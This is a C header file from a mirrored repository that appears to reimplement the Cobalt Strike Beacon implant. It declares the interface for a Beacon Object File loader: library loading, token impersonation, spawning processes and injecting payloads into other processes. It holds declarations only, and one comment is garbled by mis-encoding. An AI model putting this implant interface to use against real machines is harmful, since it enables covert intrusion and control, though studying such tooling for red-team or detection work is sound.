qwqdanchun
/
ReBeacon_Src
mirror of https://github.com/qwqdanchun/ReBeacon_Src.git
1
0
Fork 1
Code Issues Projects Releases Wiki Activity
ReBeacon_Src/ReBeacon_Src/BeaconBof.h

85 lines
3.8 KiB
C
Raw Blame History

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

#pragma once
#include "Utils.h"
#include "Global.h"
#include "comm.h"
#include "common.h"
#include "BeaconInject.h"
typedef HMODULE(__stdcall* fpLoadLibraryA)(LPCSTR lpLibFileName);
typedef BOOL(__stdcall* fpFreeLibrary)(HMODULE hLibModule);
typedef FARPROC(__stdcall* fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
typedef HMODULE(__stdcall* fpGetModuleHandleA)(LPCSTR lpModuleName);
typedef void(__cdecl* fpBeaconDataParse)(datap* parser, char* buffer, int size);
typedef char* (__cdecl* fpBeaconDataPtr)(datap* parser, int size);
typedef int(__cdecl* fpBeaconDataInt)(datap* parser);
typedef short(__cdecl* fpBeaconDataShort)(datap* parser);
typedef int(__cdecl* fpBeaconDataLength)(datap* parser);
typedef char* (__cdecl* fpBeaconDataExtract)(datap* parser, int* size);
typedef void(__cdecl* fpBeaconFormatAlloc)(formatp* format, int maxsz);
typedef void(__cdecl* fpBeaconFormatReset)(formatp* format);
typedef void(__cdecl* fpBeaconFormatAppend)(formatp* format, char* text, int len);
typedef void(__cdecl* fpBeaconFormatPrintf)(formatp* format, char* fmt, ...);
typedef char* (__cdecl* fpBeaconFormatToString)(formatp* format, int* size);
typedef void(__cdecl* fpBeaconFormatFree)(formatp* format);
typedef void(__cdecl* fpBeaconFormatInt)(formatp* format, int value);
typedef void(__cdecl* fpBeaconOutput)(int type, char* data, int len);
typedef void(__cdecl* fpBeaconPrintf)(int type, char* fmt, ...);
typedef void(__cdecl* fpBeaconErrorD)(int BeaconErrorsType, DWORD error_code);
typedef void(__cdecl* fpBeaconErrorDD)(int BeaconErrorsType, int err_msg, u_long err_code_msg);
typedef void(__cdecl* fpBeaconErrorNA)(int BeaconErrorsType);
typedef BOOL(__cdecl* fpBeaconUseToken)(HANDLE token);
typedef BOOL(__cdecl* fpBeaconIsAdmin)();
typedef void(__cdecl* fpBeaconRevertToken)();
typedef void(__cdecl* fpBeaconGetSpawnTo)(BOOL x86, char* buffer, int length);
typedef void(__cdecl* fpBeaconInjectProcess)(HANDLE hProc, int pid, char* payload, int p_len, int p_offset, char* arg, int a_len);
typedef void(__cdecl* fpBeaconInjectTemporaryProcess)(PROCESS_INFORMATION* pInfo, char* payload, int p_len, int p_offset, char* arg, int a_len);
typedef BOOL(__cdecl* fpBeaconSpawnTemporaryProcess)(BOOL x86, BOOL ignoreToken, STARTUPINFOA* si, PROCESS_INFORMATION* pInfo);
typedef void(__cdecl* fpBeaconCleanupProcess)(PROCESS_INFORMATION* pInfo);
typedef BOOL(__cdecl* fptoWideChar)(char* src, wchar_t* dst, unsigned int max);
//ע<><D7A2>һ<EFBFBD><D2BB>Ҫ<EFBFBD><D2AA><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>˳<EFBFBD><CBB3><EFBFBD><EFBFBD>Ҫ<EFBFBD><D2AA><EFBFBD>ˣ<EFBFBD><CBA3><EFBFBD>Ϊcs<63>ǰ<EFBFBD><C7B0><EFBFBD><EFBFBD><EFBFBD><EFBFBD>Ž<EFBFBD><C5BD><EFBFBD><EFBFBD><EFBFBD>
struct BeaconInternalFunctions
{
fpLoadLibraryA LoadLibraryA;
fpFreeLibrary FreeLibrary;
fpGetProcAddress GetProcAddress;
fpGetModuleHandleA GetModuleHandleA;
fpBeaconDataParse BeaconDataParse;
fpBeaconDataPtr BeaconDataPtr;
fpBeaconDataInt BeaconDataInt;
fpBeaconDataShort BeaconDataShort;
fpBeaconDataLength BeaconDataLength;
fpBeaconDataExtract BeaconDataExtract;
fpBeaconFormatAlloc BeaconFormatAlloc;
fpBeaconFormatReset BeaconFormatReset;
fpBeaconFormatAppend BeaconFormatAppend;
fpBeaconFormatPrintf BeaconFormatPrintf;
fpBeaconFormatToString BeaconFormatToString;
fpBeaconFormatFree BeaconFormatFree;
fpBeaconFormatInt BeaconFormatInt;
fpBeaconOutput BeaconOutput;
fpBeaconPrintf BeaconPrintf;
fpBeaconErrorD BeaconErrorD;
fpBeaconErrorDD BeaconErrorDD;
fpBeaconErrorNA BeaconErrorNA;
fpBeaconUseToken BeaconUseToken;
fpBeaconRevertToken BeaconRevertToken;
fpBeaconIsAdmin BeaconIsAdmin;
fpBeaconGetSpawnTo BeaconGetSpawnTo;
fpBeaconInjectProcess BeaconInjectProcess;
fpBeaconInjectTemporaryProcess BeaconInjectTemporaryProcess;
fpBeaconSpawnTemporaryProcess BeaconSpawnTemporaryProcess;
fpBeaconCleanupProcess BeaconCleanupProcess;
fptoWideChar toWideChar;
char* end;
};
struct BeaconBofRelocation
{
short Type;
short id;
int offset;
int OffsetInSection;
};
void __cdecl beacon_bof(char* Taskdata, int Tasksize);
Reference in New Issue View Git Blame Copy Permalink